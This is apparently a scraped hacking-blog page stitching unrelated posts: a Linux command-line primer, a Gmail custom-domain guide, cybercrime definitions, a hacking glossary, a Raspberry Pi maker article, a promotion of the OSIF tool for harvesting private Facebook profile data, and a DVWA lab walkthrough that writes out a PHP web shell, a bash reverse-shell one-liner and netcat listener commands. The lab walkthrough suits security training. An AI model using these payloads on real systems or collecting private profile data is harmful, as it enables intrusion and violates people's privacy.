Linux Command Line Hackery Series: Part 1

In this concise article we will learn some basics of how to use Linux Command line, so lets get started.

Requirements:

1. An open Terminal in your Linux Box. I'm using Kali Linux 2.0
or you can check out this amazing website Webminal

Command:  ls
Syntax:         ls [flag(s)]
Function:      ls is short for list. ls command is used to list the contents of a directory these contents include files, folders, and links. ls has many optional flags as well, some of them are described below
Flags:    -a this flag is used to view hidden files that is those files whose names are preceded                      by a '.'(dot)
               -l  this flag is used to view file permissions, owner of the file, group of the owner, the                        file size, the modification date, and the filename. We'll talk more about it in later                            articles.

Command:  mkdir
Syntax:         mkdir dirname
Function:      mkdir is used to create a directory (or a folder) with the name which is followed by the command

now lets create a directory in our current directory named as myfiles, how would you do that?

mkdir myfiles

which command should we use in order to verify that the directory has been created in our current folder?

ls

this will list all the files and directories in our current folder. Do you see myfiles directory listed?

Command:  cd
Syntax:         cd path/to/directory
Function:      cd is short for change directory. It is used to navigate directories, or to make it clear it does the same thing as what double clicking on a folder do except it doesn't show you contents of the directory :(. In order to navigate or visit another directory we need to provide it's ABSOLUTE-PATH or RELATIVE-PATH you heard that, didn't ya?

Paths are of two types relative path or absolute path (also called full-path). Relative as the name suggests is relative to the current directory, so if you have to navigate to a folder within the current directory you'll just simply type cd directory_name. But what if you have to navigate to a directory which is the parent of current directory? Well it's easy just type cd .. (yes double dots, you noticed that .. and . thing when you typed ls -a, didn't you?). The double dots mean the directory above current directory (i,e the parent directory) and a single dot means the current directory (i,e the directory that I'm currently in). Now if you have to navigate two directories above current directory using relative path navigation you'll type

cd ../.. 

here .. means previous directory and another .. after slash (/) means the previous directory of the previous directory sounds confusing..!

The Absolute Path means full path to the file or folder which starts from root directory. Say I want to navigate to my home folder using absolute path, then I'll type:

cd /home/user

where user is the username
Now think of navigating to the myfiles folder from your home directory using the absolute path, it will be something like this:

cd /home/user/myfiles

Exercise: Create a directory project1 inside your home directory and inside the project1 directory create a file and a directory named index.html and css respectively. Then navigate to the css directory and create a style.css file inside it. At last navigate out of the css directory to home both using the relative and absolute path mechanisms.

[Trick: To get quickly out of any directory to your home directory type cd ~ [press Enter] or simply cd [press Enter]]

Command:  touch
Syntax:         touch filename
Function:      touch is a nifty little function used to create an empty file (actually it's used to change access time of a file but everyone has got bad habits :P ). You can create any type of empty file with the touch command. If you are a bit curious about touch read the manual page of the touch command using the man touch command.

Now lets create a few files inside of our myfiles directory

touch file1 file2 file3

The above command creates three empty files in our current directory named file1, file2, and file3.
How will you verify that it has indeed created these three files in your current directory? I won't answer this time.

Command:  echo
Syntax:         echo Hacker manufacturing under process
Function:      echo is used to display a line of text. By default echo displays a line of text on the terminal which is the standard output device (stdout for short). However we can redirect the output of an echo command to a file using > (the greater than symbol).
Now if we have to echo a line of text to a file, say file1 in our myfiles directory, we will type:

echo This is file1 > file1

The above command will echo the text "This is file1" to file1.

Command:  cat
Syntax:         cat filename [anotherfilename...]
Function:      cat stands for concatenate (not that puny little creature in your house). The main function of cat is to concatenate files and display them on your terminal (or in geeky terms stdout). But its also used to display the contents of a file on your terminal.

Let's display the contents of file1 in the myfiles directory that we echoed to it using the echo command, for that we'll type:

cat file1

Awesome I can see on black screen contents of my file (what if your terminals background is white?), looks like I'm becoming a hacker. In case you don't see it then I suggest you should give up the thought of becoming a hacker. Just kidding you might have missed a step or two from the above steps that we performed.

Now lets say that we want to add another line of text to our file using the echo command should we use the same greater than (>) symbol? No, if we want to add another line (which in geeky terms is to append a line) to our file using the echo command we have to use >> (two greater than symbols) like this:

echo Another line of text >> file1

now to check the contents of file1 we'll type:

cat file1

OK we wrote two lines inside of the file1.
Does it mean we have to add three greater than symbols to write third line? Oh! I didn't thought you'd be such a genius.

A single greater than symbol (>) means redirect the output of the preceding command to a file specified after the > symbol. If the file exists then overwrite everything that's in it with the new contents and if the file does not exist then create one and write to it the output of the preceding command. So if you had typed

echo Another line of text > file1

it would have overwritten the contents of the file1 with "Another line of text" and the line "This is file1" would no longer be present in the file.

Two greater than symbols (>>) mean that append (remember the geeky term?) the output of the previous command to the end of file specified after >>. Now if you want to add another line of text to file1, you won't use >>> rather you'll use >> like this:

echo Third line in file1 >> file1

This is it for today. But don't worry we'll learn more things soon.

Continue reading

• Best Hacking Games
• Ethical Hacking
• Hacking Definicion
• Hacker Definicion
• Hacking Web Sql Injection
• Rom Hacking Pokemon
• Hacking 2018
• Hacking With Python
• Hacking Software

How To Bind Payload Any Software Using Shellter

More articles

1. Hacker Definicion
2. Hacking Tor Whatsapp
3. Como Hacer Hacker
4. Hacking Tor Funciona
5. Como Hacker
6. Ultimate Hacking Keyboard
7. Hacking Games
8. Nivel Basico
9. Curso De Hacking Gratis
10. Hacking Academy
11. Machine Learning Hacking

HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

When it comes to email providers, there's no competitor to Google's awesome features. It is efficient which connects seamlessly with the rest of your Google products such as YouTube, Drive, has a major application called Gmail Inbox, and is overall an extremely powerful email service. However, to use it with a custom domain, you need to purchase Google Apps for either $5 or $10/month, which for casual users is a bit unnecessary. On top of that, you don't even get all of the features a personal account gets, e.g. Inbox. So, here's a free way to use your Gmail account with a custom domain. I am just going to show you hacking Gmail for free custom domain email.

SO, HOW HACKING GMAIL FOR FREE CUSTOM DOMAIN EMAIL

PASSWORD: EHT

STEPS:

• First, register with Mailgun using your Gmail address. Use your Gmail only. Once you have clicked the confirm link, log in to the Mailgun website. Now you're in the dashboard, move on the right under "Custom Domains", click "Add Domain".
• Follow the setup instructions and set DNS records with whoever manages your DNS. Once you've done this, click on the "Routes" link on the top to set up email forwarding.
• Now move to the Route tab and click on Create New Route.
• As you click the button, you will see a page like below. Just enter the information as entered in the following screenshot.
• Just replace the quoted email with your desired email in the above-given screenshot.
• Next, we'll setup SMTP configuration so we would be able to send emails from an actual server. Go to "Domains" tab, click on your domain name.
• On this page, click "Manage your SMTP credentials" then "New SMTP Credential" on the next page.
• Type in the desired SMTP credentials. And, go to Gmail settings and click "Add another email address you own". Once you open, enter the email address you wish to send from.
• In the next step, set the SMTP settings as follows.
• After clicking "Add Account" button, now you're done.
• The final step, make sure to set it to default email in the Gmail settings > Accounts.

That's all. Now you got free Gmail custom domain with 10,000 emails per month. Hope it will work for you. If you find any issue, just comment below.

---

Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.

Related links

1. Hacking Ético Curso
2. Hacking Marketing
3. Libros De Hacking Pdf
4. Software Hacking
5. Hacking Y Seguridad
6. Tools Hacking

What Is Cybercrime? What Are The Types Of Cybercrime? What Is Cyberlaw In India?

What is cyber crime?

Cybercrime is the use of computers & networks to perform illegal activities such as spreading viruses,online  bullying,performing unauthorized electronic fund transfers etc. Most cyber crimes are committed through the internet.
Some cyber crime also be carried out using mobile phones via Sms and online chatting applications.

TYPES OF CYBERCRIME

The following list presents the common types of cybercrimes-

1-Computer Fraud-Intential deception for personal gain via the use of computer system.

2-Privacy Violations-Exposing personal information such as email addresses,phone numbers,account details etc, on social media,websites,etc.

3-Identity theft-Stealing personal information from somebody and impersonating that person.

4-Sharing copyright files/information-This involves distributing copyright protected files such as eBooks and computer program etc.

5-Electronic funds transfer-This involves gaining an unauthorized access to bank computer networks and making illegal funds transferring.

6-Electronic money laundering-This involves the use of the computer to launder money.

7-Atm fraud-This involves intercepting ATM card details such as account numbers and PIN numbers.These details are then used to withdraw funds from the intercepted accounts.

8-Denial of service attack-This involves the use of computers in multiple locations to attack servers with a view of shutting them down.

9-Spam:sending unauthorized emails.

These emails usually contain advertisements.

CYBER LAW

Under The Information Technology Act,2000 

CHAPTER XI-OFFENCES-66. Hacking with computer system.

1-whoever with the Intent to cause or knowing that he is likely to cause Wrongfull Loss or Damage to the public or any person Destroys or Deletes or Alter any Information Residing in computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

2-whoever commits hacking shell be punished with imprisonment up to three years, or  with fine which may extend up to two lakh rupees,or with both.

More information

1. Tecnicas De Hacking
2. Hacking Wifi
3. Hacking Etico Libro
4. Hacking Virus
5. Ingeniería Social El Arte Del Hacking Personal
6. Google Hacking Search
7. Hacking Day
8. Herramientas De Seguridad Informatica

OSIF: An Open Source Facebook Information Gathering Tool

About OSIF
   OSIF is an accurate Facebook account information gathering tool, all sensitive information can be easily gathered even though the target converts all of its privacy to (only me), sensitive information about residence, date of birth, occupation, phone number and email address.

For your privacy and security, i don't suggest using your main account!

OSIF Installtion
   For Termux users, you must install python2 and git first:
pkg update upgrade
pkg install git python2

   And then, open your Terminal and enter these commands:   If you're Windows user, follow these steps:

• Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
• Download OSIF-master zip file.
• Then unzip it.
• Open CMD or PowerShell at the OSIF folder you have just unzipped and enter these commands:
pip install -r requirements.txt
python osif.py

Before you use OSIF, make sure that:

• Turn off your VPN before using this tool.
• Do not overuse this tool.
• if you are confused how to use it, please type help to display the help menu or watch the video below.

How to use OSIF?

Download OSIF

Continue reading

1. Hacking Social
2. Curso De Hacking Etico
3. Hacking Gif
4. Elhacker Ip

Raspberry Pi Zero Para "Makers": 6 PoCs & Hacks Just For Fun (1 De 3)

Desde hace ya unas semanas, desde que se declaró el estado de alarma, millones de ciudadanos de todo el mundo nos encontramos en un periodo de confinamiento por culpa del ya famoso COVID-19. Esta situación excepcional nos ha permitido pasar más tiempo con algunos de nuestros familiares más cercanos y comenzar o retomar algunos de los proyectos que teníamos olvidados por casa.

Figura 1: Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)

Si este es tu caso y estás buscando alguna idea interesante con la que entretenerte en esta cuarentena has llegado al sitio correcto. En esta serie de tres artículos os presentaremos a vosotros los "Makers" o los que queréis ser "Makers" alguna vez,  seis interesantes proyectos basados en la Raspberry Pi  Zero y os explicaremos cómo llevarlos a cabo.

Figura 2: Arduino para Hackers: PoCs & Hacks Just for fun
en 0xWord de Álvaro Núñez-Romero

Este articulo está hecho al más puro ejemplo del libro de 0xWord para "Makers" que hace lo mismo: Arduino para Hackers: PoCs & Hacks Just for Fun (del que además tenéis un VBOOK con sesiones en vídeo de los hacks). Además, os dejo aquí otras referencias de otros hacks hechos con Raspberry Pi y que han sido publicados en este blog.

- Raspberry Pi: Cómo construir un medidor ambiental
- Raspberry Pi: Dirtytooth para Raspberry Pi v2.0
- Raspberry Pi: Una VPN para navegar por redes WiFi con portales cautivos
- Raspberry Pi: Pi Guardian con Latch, Bots en Telegram y "ojos"
- Raspberry Pi: Latch My Carç
- Rapsberry Pi: Tu servicio VPN con OpenVPN, Latch y Virus Total
- Raspberry Pi: Latch en OpenWRT

Y ahora, vamos a por los seis proyectos que puedes hacer tú en tu casa para entretenerte y meterte en el mundo de los "makers" de una vez por todas si tenías ganas de ello.

1.- Pi Zero Drone: Drone "Low-Cost" con Raspberry Pi Zero

El primero de los proyectos de los que os hablaremos hoy se trata de la construcción de un Drone Low-Cost - por menos de 200 € - el cual se basará en una distribución de GNU/Linux y utilizara la Raspberry Pi 0 como placa controladora o cerebro. El mundo de los drones y cuadrocopteros ligeros cuenta con millones de aficionados, con Pi Zero Drone es posible acercar un poco más este mundillo a todos aquellos que quieren introducirse en la construcción de estos divertidos aparatos.

Figura 3: Pi0Drone un drone por 200 USD

Si no estás familiarizado con la construcción de drones de carreras o de cualquier otro tipo no tienes de que preocuparte, a continuación te explicaremos cuales son las piezas necesarias para este montaje y como se ensamblan pero si te gusta el mundo de los Drones, y tienes inclinaciones de "maker", puedes leer el libro de David Meléndez Calero que habla justo de estas cosas: "Hacking con Drones: Love is in the air".

Figura 4: Hacking con Drones: "Love is in the air"

Las piezas necesarias serán las siguientes: chasis, variadores, motores, hélices, batería, controladora PFX mini (69 €) y por supuesto una Raspberry Pi Zero. Lo primero será realizar el montaje del drone, este proceso es bastante sencillo y no debería llevarte más de 1 hora. Comenzaremos con el montaje de la estructura, en cada brazo del chasis hay que fijar un motor sujetándolo con tornillos (vienen con kit del chasis), a continuación se deben conectar los variadores a los motores (utilizando los cables de colores) y fijarlos en la zona central de los brazos.

Figura 5: Kit de Pi Zero Drone

Para terminar hay que situar la Raspberry Pi Zero y la controladora PFX mini en el centro del chasis, conectando ambas entre sí utilizando los pines y separadores de teflón que vienen en el kit de la controladora. Por último solo queda conectar el módulo de la batería y fíjalo a la parte inferior del chasis utilizando los velcros que te vienen con el kit. También hay que colocar una hélice en cada motor.

Figura 6: Pi Zero Drone montado

Una vez tengamos el montaje realizado pasaremos a la parte de configuración del autopilot (PFX mini + Raspberry Pi Zero), lo bueno del kit de Erle Robotics es que incluye acceso a sus imágenes Debian compatibles con la PFX mini, así que solo tendrás que guardarlas en una tarjeta micro SD e introducirla en tu Raspberry Pi Zero.

Por ultimo conectaremos el cable JST GH del módulo de alimentación a nuestro montaje de autopilot, lo que hará que al conectar la batería se encienda el drone. Ya solo nos queda conectar los variadores de cada brazo con su respectivo pin a la PFX mini (PWM1 con ESC1, PWM2 con ESC2 y sucesivamente) ya que dos de los motores giraran en sentido horario y otros dos en anti horario.


Figura 7: Cosntrucción de Pi Zero Drone paso a paso
Con el drone ya construido y listo para volar solo queda decidir qué dispositivo utilizar para controlarlo. En este caso el método más sencillo es utilizar una emisora de radio control convencional que cuente con un receptor (el cual montaremos en el drone). Tienes en la página web toda la información detallada del proyecto Pi Zero Drone con un paso a paso.

2.- Zero Phone: construcción de un Smartphone con Raspberry Pi Zero

El segundo de los proyectos del que os hablaremos hoy es la construcción de un mini teléfono móvil, sin duda un proyecto bastante interesante. En este caso la idea surgió de un proyecto de crowdfounding y sus creadores aseguran que es posible construir el smartphone por menos de 50 €.

Figura 8: Web del proyecto ZeroPhone

Este proyecto ha recibido el nombre de Zerophone, es Open Source y está basado en una distribución de GNU/Linux. Una de las mayores ventajas de construir el teléfono nosotros mismos es que nunca tendremos problemas de portabilidad o incompatibilidad con la tarjeta SIM de cualquier operadora de telecomunicaciones. Aunque el Zerophone sea un dispositivo de aspecto muy sencillo será capaz de ejecutar numerosas aplicaciones - solo GNU/Linux pone los limites -, además contará con acceso root.

En cuanto a su hardware, al basarse en una Raspberry Pi Zero este es fácil de modificar y reparar.Una vez hayas adquirido tu kit Zerophone o hayas recopilado todos los componentes necesarios solo tendrás que descargar el software gratuito y seguir paso a paso las instrucciones que encontrarás en la página web del proyecto.

Figura 9: Aspecto de Zero Phone

Si nos fijamos en sus especificaciones se podría decir que es un Smartphone bastante completo, además de contar con iluminación RGB y vibración dispone de una entrada micro HDMI, un puerto USB (de tamaño completo) y un jack de 3.5 en el que podemos conectar auriculares. También cuenta con conectividad Wi-Fi, 2G y es posible implementar BlueTooth.

Figura 10: ZeroPhone kit

En cuanto a la pantalla y teclado cuenta con una pantalla de 1,3 pulgadas y un teclado similar al de los teléfonos móviles de la década anterior. Si esta configuración no te resulta cómoda también es posible sustituir la pantalla y el teclado por una pantalla táctil de Raspberry Pi Zero. Tienes un buen análisis hecho por Javier Pastor en el blog de Xakata.

Una de las cosas que hacen bastante atractivo este proyecto es la posibilidad de conectar el dispositivo a un monitor y de utilizar teclado y ratón para controlarlo o modificar sus funciones desde su API. Si modificar el software del dispositivo no te parece suficiente también puedes personalizar por completo el hardware, es posible integrar una cámara hasta de 8 megapíxeles, nuevos botones o sensores analógicos o digitales, se puede añadir una batería más duradera, añadir distintos módulos (GPS, radio,…) o recurrir a la impresión 3D para diseñar una carcasa totalmente personalizada.


Figura 11: Puedes tener TOR en tu ZeroPhone y navegar por la Deep Web
Zerophone es una plataforma ideal para la realización de diversos proyectos, es posible utilizar cualquier lenguaje de programación en él y además permite la ejecución de APIs, scripts SSH y de consolas UART, e incluso, como se ve en la Figura 11, navegar por TOR.

Como veis son proyectos que requieren cierta maña, pero no me digáis que en lugar de estar haciendo puzzles de 1.000 piezas no es mejor estar convirtiéndote en un "maker" y jugando con el hardware y el software.

Autor: Sergio Sancho Azcoitia

***********************************************************************************
- Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)
- Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)
- Raspberry Pi Zero para "Makers": 6 PoCs & Hacks Just for Fun (1 de 3)
***********************************************************************************

Sigue Un informático en el lado del mal RSS 0xWord

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related news

• Curso Hacker
• El Mejor Hacker Del Mundo
• Como Aprender A Hackear Desde Cero
• Que Estudia Un Hacker
• Experto En Seguridad Informática
• Definicion De Hacker
• Hacking Con Buscadores Pdf
• Viral Hacking
• Car Hacking
• Hacking Online Games

TERMINOLOGIES OF ETHICAL HACKING

What is the terminologies in ethical hacking?

Here are a few key terms that you will hear in discussion about hackers and what they do:

1-Backdoor-A secret pathway a hacker uses to gain entry to a computer system.

2-Adware-It is the softw-are designed to force pre-chosen ads to display on your system.

3-Attack-That action performs by a attacker on a system to gain unauthorized access.

4-Buffer Overflow-It is the process of attack where the hacker delivers malicious commands to a system by overrunning an application buffer.

5-Denial-of-Service attack (DOS)-A attack designed to cripple the victim's system by preventing it from handling its normal traffic,usally by flooding it with false traffic.

6-Email Warm-A virus-laden script or mini-program sent to an unsuspecting victim through a normal-looking email message.

7-Bruteforce Attack-It is an automated and simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords,again & again until it gets in from bruteforce dictionary.

8-Root Access-The highest level of access to a computer system,which can give them complete control over the system.

9-Root Kit-A set of tools used by an intruder to expand and disguise his control of the system.It is the stealthy type of software used for gain access to a computer system.

10-Session Hijacking- When a hacker is able to insert malicious data packets right into an actual data transmission over the internet connection.

11-Phreaker-Phreakers are considered the original computer hackers who break into the telephone network illegally, typically to make free longdistance phone calls or to tap lines.

12-Trojan Horse-It is a malicious program that tricks the computer user into opening it.There designed with an intention to destroy files,alter information,steal password or other information.

13-Virus-It is piece of code or malicious program which is capable of copying itself has a detrimental effect such as corrupting the system od destroying data. Antivirus is used to protect the system from viruses.

14-Worms-It is a self reflicating virus that does not alter  files but resides in the active memory and duplicate itself.

15-Vulnerability-It is a weakness which allows a hacker to compromise the security of a computer or network system to gain unauthorized access.

16-Threat-A threat is a possible danger that can exploit an existing bug or vulnerability to comprise the security of a computer or network system. Threat is of two types-physical & non physical.

17-Cross-site Scripting-(XSS) It is a type of computer security vulnerability found in web application.It enables attacker to inject client side script into web pages viwed by other users.

18-Botnet-It is also known as Zombie Army is a group of computers controlled without their owner's knowledge.It is used to send spam or make denial of service attacks.

19-Bot- A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a period than a human operator could do it.Example-Sending HTTP, FTP oe Telnet at a higer rate or calling script to creat objects at a higher rate.

20-Firewall-It is a designed to keep unwanted intruder outside a computer system or network for safe communication b/w system and users on the inside of the firewall.

21-Spam-A spam is unsolicited email or junk email sent to a large numbers of receipients without their consent.

22-Zombie Drone-It is defined as a hi-jacked computer that is being used anonymously as a soldier or drone for malicious activity.ExDistributing Unwanted Spam Emails.

23-Logic Bomb-It is a type of virus upload in to a system that triggers a malicious action when certain conditions are met.The most common version is Time Bomb.

24-Shrink Wrap code-The process of attack for exploiting the holes in unpatched or poorly configured software.

25-Malware-It is an umbrella term used to refer a variety of intrusive software, including computer viruses,worms,Trojan Horses,Ransomeware,spyware,adware, scareware and other malicious program.

Follow me on instagram-anoymous_adi

Related posts

1. Growth Hacking Courses
2. Linux Hacking Distro
3. Hacking Etico 101 Pdf
4. Rom Hacking
5. Curso De Hacking

Learning Web Pentesting With DVWA Part 5: Using File Upload To Get Shell

In today's article we will go through the File Upload vulnerability of DVWA. File Upload vulnerability is a common vulnerability in which a web app doesn't restrict the type of files that can be uploaded to a server. The result of which is that a potential adversary uploads a malicious file to the server and finds his/her way to gain access to the server or perform other malicious activities. The consequences of Unrestricted File Upload are put out by OWASP as: "The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored."
For successful vulnerability exploitation, we need two things:
1. An unrestricted file upload functionality.
2. Access to the uploaded file to execute the malicious code.
To perform this type of attack on DVWA click on File Upload navigation link, you'll be presented with a file upload form like this:

Lets upload a simple text file to see what happens. I'll create a simple text file with the following command:

echo TESTUPLOAD > test.txt

and now upload it.

The server gives a response back that our file was uploaded successfully and it also gives us the path where our file was stored on the server. Now lets try to access our uploaded file on the server, we go to the address provided by the server which is something like this:

http://localhost:9000/hackable/uploads/test.txt

and we see the text we had written to the file. Lets upload a php file now since the server is using php. We will upload a simple php file containing phpinfo() function. The contents of the file should look something like this.

<?php
phpinfo();
?>

Save the above code in a file called info.php (you can use any name) and upload it. Now naviagte to the provided URL:

http://localhost:9000/hackable/uploads/info.php

and you should see a phpinfo page like this:

phpinfo page contains a lot of information about the web application, but what we are interested in right now in the page is the disable_functions column which gives us info about the disabled functions. We cannot use disabled functions in our php code. The function that we are interested in using is the system() function of php and luckily it is not present in the disable_functions column. So lets go ahead and write a simple php web shell:

<?php
system($_GET["cmd"]);
?>

save the above code in a file shell.php and upload it. Visit the uploaded file and you see nothing. Our simple php shell is looking for a "cmd" GET parameter which it passes then to the system() function which executes it. Lets check the user using the whoami command as follows:

http://localhost:9000/hackable/uploads/shell.php?cmd=whoami

we see a response from the server giving us the user under which the web application is running.

We can use other bash commands such as ls to list the directories. Lets try to get a reverse shell now, we can use our existing webshell to get a reverse shell or we can upload a php reverse shell. Since we already have webshell at our disposal lets try this method first.

Lets get a one liner bash reverseshell from Pentest Monkey Reverse Shell Cheat Sheet and modify it to suit our setup, but we first need to know our ip address. Enter following command in a terminal to get your ip address:

ifconfig docker0

the above command provides us information about our virtual docker0 network interface. After getting the ip information we will modify the bash one liner as:

bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1'

here 172.17.0.1 is my docker0 interface ip and 9999 is the port on which I'll be listening for a reverse shell. Before entering it in our URL we need to urlencode it since it has some special characters in it. After urlencoding our reverse shell one liner online, it should look like this:

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27

Now start a listener on host with this command:

nc -lvnp 9999

and then enter the url encoded reverse shell in the cmd parameter of the url like this:

http://localhost:9000/hackable/uploads/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.17.0.1%2F9999%200%3E%261%27

looking back at the listener we have a reverse shell.

Now lets get a reverse shell by uploading a php reverse shell. We will use pentest monkey php reverse shell which you can get here. Edit the ip and port values of the php reverse shell to 172.17.0.1 and 9999. Setup our netcat listener like this:

nc -lvnp 9999

and upload the reverse shell to the server and access it to execute our reverse shell.

That's it for today have fun.

References:

1. Unrestricted File Upload: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
2. Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
3. Php Reverse Shell (Pentest Monkey): https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Read more

• Hacking Wifi
• Black Hacker
• Herramientas Hacking
• Hacking Hardware
• Phishing Hacking
• Curso De Ciberseguridad Y Hacking Ético